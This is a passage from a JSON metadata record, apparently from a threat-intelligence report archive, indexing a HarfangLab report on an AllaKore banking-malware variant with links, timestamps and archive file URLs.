		"Malpedia"
	],
	"references": [
		"https://harfanglab.io/insidethelab/allasenha-allakore-variant-azure-c2-steal-banking-latin-america/"
	],
	"report_names": [
		"allasenha-allakore-variant-azure-c2-steal-banking-latin-america"
	],
	"threat_actors": [],
	"ts_created_at": 1775791200,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.pdf",
		"text": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.txt",
		"img": "https://archive.orkl.eu/6ff0c82c4cbb94cdfd6e579550a69b7d15bbae67.jpg"
	}
}